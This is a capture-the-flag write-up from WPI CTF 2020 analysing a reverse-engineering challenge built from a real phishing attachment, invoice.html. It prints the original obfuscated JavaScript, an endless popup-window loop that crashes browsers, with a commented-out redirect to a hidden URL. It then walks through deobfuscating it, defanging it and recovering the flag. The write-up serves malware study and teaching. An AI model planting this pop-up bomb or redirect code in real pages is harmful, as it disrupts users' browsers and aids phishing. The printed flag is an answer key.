## Dangerous Live and Malicious Code

* **CTF:** WPI CTF 2020
* **Category:** rev
* **Points:** 50
* **Author(s):** b0uldrr
* **Date:** 18/04/20

---

### Challenge
```
Like the title says, this challenge is dangerous and contains live malware.

Shoutout to the hacker that I stole this from challenge from. Sadly I can't give them credit because they sent the phish from a compromised email, but it's literally his/her code. I just defanged it (a little bit - it will still crash your webbrowser (usually, but don't test that outside of a VM)) and stuck a WPI flag in here.

To prevent accidental execution the file has been zipped with the password "I_understand_that_this_challenge_contains_LIVE_MALWARE"

http://us-east-1.linodeobjects.com/wpictf-challenge-files/invoice.zip

made by: The_Abjuri5t (John F.)
```

### Downloads
* ![invoice.zip](invoice.zip)

---

### Solution

Inside the provided zip file is a single file, `invoice.html`. The source code contains obfuscated javascript.

```html
<html>
<head>
<title></title>
</head>
<body>
<script>var a = ['ps:','cte','5df','se_','toS','ing','tri','sub','lac','ryt','d}.','cod','pro','_no','ran','ing','dom','str','ete','rep'];function abc(def) { popupWindow = window.open( def,'popUpWindow','height=666,width=666,left=666,top=666') }(function(c, d) {var e = function(f) {while (--f) {c['push'](c['shift']());}};e(++d);}(a, 0xa8));var b = function(c, d) {c = c - 0x0;var e = a[c];return e;};var c = 'htt' + b('0xc') + '//t' + b('0x1') + b('0xe') + 'xc-' + 'rWP' + 'I';var d = '{Oh' + b('0x5') + b('0xf') + b('0x4') + b('0x3') + b('0x7') + '_d';var e = b('0xa') + b('0xd') + b('0x2') + 'net' + '/';var f = Math[b('0x6') + b('0x8')]()[b('0x10') + b('0x12') + 'ng'](0x6)[b('0x13') + b('0x9') + b('0x11')](0x2, 0xf) + Math['ran' + 'dom']()[b('0x10') + b('0x12') + 'ng'](0x10)[b('0x13') + b('0x9') + b('0x11')](0x2, 0xf);var g = Math['ran' + 'dom']()[b('0x10') + b('0x12') + 'ng'](0x24)[b('0x13') + b('0x9') + b('0x11')](0x2, 0xf) + Math[b('0x6') + b('0x8')]()['toS' + b('0x12') + 'ng'](0x24)[b('0x13') + b('0x9') + b('0x11')](0x2, 0xf);/*location[b('0xb') + b('0x0') + 'e'](c + d + e + '?' + f + '=' + g);*/for(var i=1;i===i;i++){abc(self.location,'_blank');}</script></body>
</html>
```
I unobfuscated it at [jsnice.org](jsnice.org)

```javascript
var a = ["ps:", "cte", "5df", "se_", "toS", "ing", "tri", "sub", "lac", "ryt", "d}.", "cod", "pro", "_no", "ran", "ing", "dom", "str", "ete", "rep"];

function abc(url) {
  popupWindow = window.open(url, "popUpWindow", "height=666,width=666,left=666,top=666");
}

(function(params, i) {
  var write = function(isLE) {
    for (; --isLE;) {
      params["push"](params["shift"]());
    }
  };
  write(++i);
})(a, 168);

var b = function(e, dt) {
  e = e - 0;
  var ret = a[e];
  return ret;
};

var c = "htt" + b("0xc") + "//t" + b("0x1") + b("0xe") + "xc-" + "rWP" + "I";

var d = "{Oh" + b("0x5") + b("0xf") + b("0x4") + b("0x3") + b("0x7") + "_d";

var e = b("0xa") + b("0xd") + b("0x2") + "net" + "/";

var f = Math[b("0x6") + b("0x8")]()[b("0x10") + b("0x12") + "ng"](6)[b("0x13") + b("0x9") + b("0x11")](2, 15) + Math["ran" + "dom"]()[b("0x10") + b("0x12") + "ng"](16)[b("0x13") + b("0x9") + b("0x11")](2, 15);

var g = Math["ran" + "dom"]()[b("0x10") + b("0x12") + "ng"](36)[b("0x13") + b("0x9") + b("0x11")](2, 15) + Math[b("0x6") + b("0x8")]()["toS" + b("0x12") + "ng"](36)[b("0x13") + b("0x9") + b("0x11")](2, 15);

var i = 1;
for (; i === i; i++) {
  abc(self.location, "_blank");
}
;
```

This script does the following:
1. Builds a URL string using variables a, c, d, e, f and g, and function b. This is just a way to obfuscate the URL.
1. Starts an infinite loop to continually call the `abc` function, which just opens `invoice.html` again. These new pages will start their own infinite loops to continually open more pages. This may crash some browsers but won't have any other malicious effect. This may have been the entire purpose of the original malware, or perhaps it also called a variation of the URL built in step 1 over and over again.

I made three changes to render the script inert:
1. Change the `for loop` at the bottom of the script from a infinite loop to a limited loop:
	* `for (; i === i; i++)` changed to:
	* `for(; i<5; i++)`
1. Change the code in the `abc` function from making a new window to creating a pop-up alert instead:
	* `popupWindow = window.open(url, "popUpWindow", "height=666,width=666,left=666,top=666");` changed to
	* `alert(url);`

This meant that the program would only produce 5 alert boxes before stopping. I also added a pop-up alert after the creation of the variable `g` so that I could see the value of the string produced by variables `a` through `g`:
* `alert(c+d+e+f+g)`

Here's my modified script:

```html
<html>
<head>
<title></title>
</head>
<body>
<script>
var a = ["ps:", "cte", "5df", "se_", "toS", "ing", "tri", "sub", "lac", "ryt", "d}.", "cod", "pro", "_no", "ran", "ing", "dom", "str", "ete", "rep"];

function abc(url) {
  alert(url);
}

(function(params, i) {
  var write = function(isLE) {
    for (; --isLE;) {
      params["push"](params["shift"]());
    }
  };
  write(++i);
})(a, 168);

var b = function(e, dt) {
  e = e - 0;
  var ret = a[e];
  return ret;
};

var c = "htt" + b("0xc") + "//t" + b("0x1") + b("0xe") + "xc-" + "rWP" + "I";

var d = "{Oh" + b("0x5") + b("0xf") + b("0x4") + b("0x3") + b("0x7") + "_d";

var e = b("0xa") + b("0xd") + b("0x2") + "net" + "/";

var f = Math[b("0x6") + b("0x8")]()[b("0x10") + b("0x12") + "ng"](6)[b("0x13") + b("0x9") + b("0x11")](2, 15) + Math["ran" + "dom"]()[b("0x10") + b("0x12") + "ng"](16)[b("0x13") + b("0x9") + b("0x11")](2, 15);

var g = Math["ran" + "dom"]()[b("0x10") + b("0x12") + "ng"](36)[b("0x13") + b("0x9") + b("0x11")](2, 15) + Math[b("0x6") + b("0x8")]()["toS" + b("0x12") + "ng"](36)[b("0x13") + b("0x9") + b("0x11")](2, 15);

alert(c+d+e+f+g)

var i = 1;
for (; i<5; i++) {
  abc(self.location, "_blank");
}
</script>
</body>
</html>
```

Running the script, my alert box in the main function fires and prints the flag:

![flag](images/flag.png)

---

### Flag 
```
WPI{Oh_nose_procoding_detected}
```
